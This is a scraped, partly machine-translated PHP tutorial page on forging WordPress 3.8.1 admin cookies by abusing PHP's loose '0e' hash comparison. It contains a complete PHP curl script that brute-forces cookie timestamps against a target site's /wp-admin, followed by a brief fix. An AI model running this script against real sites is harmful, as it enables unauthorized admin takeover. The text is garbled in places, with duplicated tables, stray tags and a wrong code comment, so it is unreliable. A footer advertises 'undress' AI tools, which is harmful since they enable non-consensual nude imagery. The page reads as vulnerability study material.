Backend Development
PHP Tutorial
PHP weak type: WordPress Cookie forgery, wordpresscookie_PHP tutorial
PHP weak type: WordPress Cookie forgery, wordpresscookie_PHP tutorial
PHP weak type: WordPress Cookie forgery, wordpresscookie
1 PHP weak type
PHP is a weakly typed language, so variables will automatically undergo type conversion due to different usage scenarios. Use == and in PHP! = When performing equality judgment, type conversion will be performed automatically, using === and ! == The type will not be automatically converted when making judgments.
<span>1</span> <?<span>php </span><span>2</span> <span>$a</span> = 3<span>; </span><span>3</span> <span>$b</span> = '3vic'<span>; </span><span>4</span> <span>var_dump</span>(<span>$a</span> == <span>$b</span>);<span>//</span><span>true</span> <span>5</span> <span>var_dump</span>(<span>$a</span> != <span>$b</span>);<span>//</span><span>false</span> <span>6</span> <span>var_dump</span>(<span>$a</span> === <span>$b</span>);<span>//</span><span>true</span> <span>7</span> <span>var_dump</span>(<span>$a</span> !== <span>$b</span>);<span>//</span><span>false</span> <span>8</span> ?>
Note: When converting a string into an integer in PHP, if it starts with a number, it will be converted to the previous number ('3vic' -> 3). If it does not start with a number, it will be converted to 0 (' vic' -> 0)
2 WordPress code
- WordPress 3.8.1 and WordPress 3.8.2 Some code differences
<span>1</span> <?<span>php
</span><span>2</span> <span>//</span><span> WordPress 3.8.1</span>
<span>3</span> <span>if</span> (<span>$hmac</span> != <span>$hash</span><span>) {}
</span><span>4</span> <span>//</span><span> WordPress 3.8.2</span>
<span>5</span> <span>if</span> ( hash_hmac('md5', <span>$hmac</span>, <span>$key</span>) !== hash_hmac('md5', <span>$hash</span>, <span>$key</span><span>) ) {}
</span><span>6</span> ?>- Cookie Composition
The client background only verifies one of the cookies, as shown below
wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|<span>1433403595</span>|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly
The cookie name wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 is in the format of wordpress_ md5(siteurl) where siteurl is WordPress URL, the website address here is <code><span>http://www.test.ichunqiu</span>,http://www.test.ichunqiu<span>c47f4a97d0321c1980bb76fc00d1e78f</span>, After md5 encryption, it is </p>c47f4a97d0321c1980bb76fc00d1e78f<p>, Other parts can also be omitted.
| 对应变量 | $username | $expiration | $hmac |
| cookies | admin | 1433403595 | cf50f3b50eed94dd0fdc3d3ea2c7bbb |
| <🎜>Corresponding variable<🎜> | <🎜>$username<🎜> | <🎜>$expiration<🎜> | <🎜>$hmac<🎜> |
| <🎜>cookies<🎜> | <🎜>admin<🎜> | <🎜>1433403595<🎜> | <🎜>cf50f3b50eed94dd0fdc3d3ea2c7bbb<🎜> |
- 分析验证登录
代码 wp-includes/pluggable.php 第543-549行
<span>1</span> <?<span>php
</span><span>2</span> <span>$key</span> = wp_hash(<span>$username</span> . <span>$pass_frag</span> . '|' . <span>$expiration</span>, <span>$scheme</span><span>);
</span><span>3</span> <span>$hash</span> = hash_hmac('md5', <span>$username</span> . '|' . <span>$expiration</span>, <span>$key</span><span>);
</span><span>4</span> <span>if</span> ( <span>$hmac</span> != <span>$hash</span><span> ) {
</span><span>5</span> do_action('auth_cookie_bad_hash', <span>$cookie_elements</span><span>);
</span><span>6</span> <span>return</span> <span>false</span><span>;
</span><span>7</span> } 在代码所使用的变量中,通过改变客户端Cookie 的方式可控的有 $username 用户名,$expiration 有效期,又因为其中用户名是固定的,因此只有$expiration是可控的,所以我们可以从改变 <span>$expiration </span>的方法来改变$hash。
- 结合PHP Hash 比较缺陷分析 WordPress
有以下几种可能使 $hmac == $hash 为真,字符串完全相等或者 $hmac 等于0的同时 <span>$hash</span> 为以字符开头的字符串; 将客户端的Cookie中 $hmac 值改为0,然后在if ( $hmac != $hash ) {的上面一行写入<span>var_dump($hmac);die()</span>;发现打印出来 $hmac 的结果是 string '0'而不是int 0, 那么有没有方法使字符串识别为整数呢,代码如下:
<span>1</span> <?<span>php
</span><span>2</span> <span>var_dump</span>('0' == '0e156464513131');<span>//</span><span>true</span> 其中的 0e156464513131 会被识别为0乘以10的156464513131次方,还是得0;因此当 $hash 以0e开头后面全是数字时就会与 <span>$hmac</span> 的值为 '0' 时相等,所以我们可以将客户端的Cookie设置为类似 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 然后不断更新过期时间(现在1433403595的位置)的方法来碰撞服务器端,一旦 $hash 的值为0e开头后面全是数字即可验证通过。假设碰撞成功,就修改浏览器的Cookie,直接访问后台地址,就可以成功登陆后台。
3 测试脚本
通过改变客户端Cookie里过期时间的值,不断尝试登录后台,找出可以进入后台的时间戳,从而实现Cookie伪造登录后台。
<span> 1</span> <?<span>php
</span><span> 2</span> <span>/*</span>
<span> 3</span>
<span> 4</span> <span>本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测
</span><span> 5</span> <span>传入两个值
</span><span> 6</span> <span> WordPress 的主页 $host
</span><span> 7</span> <span> 管理员用户名 $root
</span><span> 8</span> <span>*/</span>
<span> 9</span> <span>header</span>("Content-type:text/html;charset=utf-8"<span>);
</span><span>10</span>
<span>11</span> <span>$host</span> = 'http://xxx.xxx.xxx';<span>//</span><span>主页地址 结尾不带'/'</span>
<span>12</span> <span>$root</span> = 'user';<span>//</span><span>管理员用户名</span>
<span>13</span>
<span>14</span> <span>$url</span> = <span>$host</span>.'/wp-admin/';<span>//</span><span>后台管理地址 </span>
<span>15</span> <span>$sitehash</span>=<span>md5</span>(<span>$host</span><span>);
</span><span>16</span>
<span>17</span> <span>echo</span> "\nWelcome\n\n"<span>;
</span><span>18</span> <span>//</span><span>通过时间戳暴力破解cookie 实现伪造cookie</span>
<span>19</span> <span>for</span>(<span>$i</span>=1500000000;<span>$i</span><1600000000;<span>$i</span>++<span>){
</span><span>20</span> <span>$cookie</span> = "wordpress_".<span>$sitehash</span>."=".<span>$root</span>."|".<span>$i</span>."|0;";<span>//</span><span>组合构造cookie</span>
<span>21</span> <span>$header</span> = <span>array</span><span>(
</span><span>22</span> "Content-Type:application/x-www-form-urlencoded",
<span>23</span> 'User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)',
<span>24</span> "Cookie:".<span>$cookie</span>,
<span>25</span> <span> );
</span><span>26</span>
<span>27</span> <span>$curl</span> = curl_init(); <span>//</span><span> 启动一个CURL会话 </span>
<span>28</span> curl_setopt(<span>$curl</span>, CURLOPT_URL, <span>$url</span>); <span>//</span><span> 要访问的地址</span>
<span>29</span> curl_setopt(<span>$curl</span>, CURLOPT_FOLLOWLOCATION, 1); <span>//</span><span> 使用自动跳转 </span>
<span>30</span> curl_setopt(<span>$curl</span>, CURLOPT_AUTOREFERER, 1); <span>//</span><span> 自动设置Referer </span>
<span>31</span> curl_setopt(<span>$curl</span>, CURLOPT_HTTPGET, <span>true</span>); <span>//</span><span> 发送一个常规的Post请求 </span>
<span>32</span> curl_setopt(<span>$curl</span>, CURLOPT_HTTPHEADER, <span>$header</span>); <span>//</span><span> 读取上面所储存的Cookie信息 </span>
<span>33</span> curl_setopt(<span>$curl</span>, CURLOPT_RETURNTRANSFER, 1); <span>//</span><span> 获取的信息以文件流的形式返回 </span>
<span>34</span> curl_setopt(<span>$curl</span>, CURLOPT_HEADER, <span>false</span><span>);
</span><span>35</span> curl_setopt(<span>$curl</span>, CURLOPT_HEADER, 0<span>);
</span><span>36</span> curl_setopt(<span>$curl</span>, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);<span>//</span><span>让curl自动选择版本</span>
<span>37</span> <span>$tmpInfo</span> = curl_exec(<span>$curl</span>); <span>//</span><span> 执行操作</span>
<span>38</span> <span>if</span> (curl_errno(<span>$curl</span><span>)) {
</span><span>39</span> <span>echo</span> 'Errno'.curl_error(<span>$curl</span><span>);
</span><span>40</span> <span> }
</span><span>41</span> curl_close(<span>$curl</span>); <span>//</span><span> 关闭CURL会话
</span><span>42</span>
<span>43</span> <span> //匹配结果</span>
<span>44</span> <span>if</span>(<span>strstr</span>(<span>$tmpInfo</span>,'我们准备了几个链接供您开始'<span>)){
</span><span>45</span> <span>echo</span> "\n".'success : '.<span>$cookie</span>."\n\n"<span>;
</span><span>46</span> <span>break</span><span>;
</span><span>47</span> }<span>else</span><span>{
</span><span>48</span> <span>echo</span> 'fail : '.<span>$cookie</span>."\n"<span>;
</span><span>49</span> <span> }
</span><span>50</span>
<span>51</span> <span> }
</span><span>52</span> ?> 说明:理论上32位的MD5值以0e开头的大概三亿分之一,碰撞到可以利用的 <span>$expiration </span>几率极低。
5 修复方案
PHP 中使用的哈希比较函数,将其中的 == , != 分别更改为 === 和 !== 或者 将比较的两个变量使用MD5再加密一次。
学习笔记:http://ichunqiu.com/course/167
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
How to adjust the wordpress article list
Apr 20, 2025 am 10:48 AM
There are four ways to adjust the WordPress article list: use theme options, use plugins (such as Post Types Order, WP Post List, Boxy Stuff), use code (add settings in the functions.php file), or modify the WordPress database directly.
What are the plugins for wordpress blocking ip
Apr 20, 2025 am 08:27 AM
WordPress IP blocking plugin selection is crucial. The following types can be considered: based on .htaccess: efficient, but complex operation; database operation: flexible, but low efficiency; firewall: high security performance, but complex configuration; self-written: highest control, but requires more technical level.
WordPress website account login
Apr 20, 2025 am 09:06 AM
To log in to a WordPress website account: Visit the login page: Enter the website URL plus "/wp-login.php". Enter your username and password. Click "Login". Verification Two-step Verification (optional). After successfully logging in, you will see the website dashboard.
What to do if there is an error in wordpress
Apr 20, 2025 am 11:57 AM
WordPress Error Resolution Guide: 500 Internal Server Error: Disable the plug-in or check the server error log. 404 Page not found: Check permalink and make sure the page link is correct. White Screen of Death: Increase the server PHP memory limit. Database connection error: Check the database server status and WordPress configuration. Other tips: enable debug mode, check error logs, and seek support. Prevent errors: regularly update WordPress, install only necessary plugins, regularly back up your website, and optimize website performance.
How to display wordpress comments
Apr 20, 2025 pm 12:06 PM
Enable comments in WordPress website: 1. Log in to the admin panel, go to "Settings" - "Discussions", and check "Allow comments"; 2. Select a location to display comments; 3. Customize comments; 4. Manage comments, approve, reject or delete; 5. Use <?php comments_template(); ?> tags to display comments; 6. Enable nested comments; 7. Adjust comment shape; 8. Use plugins and verification codes to prevent spam comments; 9. Encourage users to use Gravatar avatar; 10. Create comments to refer to
How to change the head image of the wordpress theme
Apr 20, 2025 am 10:00 AM
A step-by-step guide to replacing a header image of WordPress: Log in to the WordPress dashboard and navigate to Appearance >Theme. Select the topic you want to edit and click Customize. Open the Theme Options panel and look for the Site Header or Header Image options. Click the Select Image button and upload a new head image. Crop the image and click Save and Crop. Click the Save and Publish button to update the changes.
How to write a header of a wordpress
Apr 20, 2025 pm 12:09 PM
The steps to create a custom header in WordPress are as follows: Edit the theme file "header.php". Add your website name and description. Create a navigation menu. Add a search bar. Save changes and view your custom header.
How to build a website for wordpress host
Apr 20, 2025 am 11:12 AM
To build a website using WordPress hosting, you need to: select a reliable hosting provider. Buy a domain name. Set up a WordPress hosting account. Select a topic. Add pages and articles. Install the plug-in. Customize your website. Publish your website.
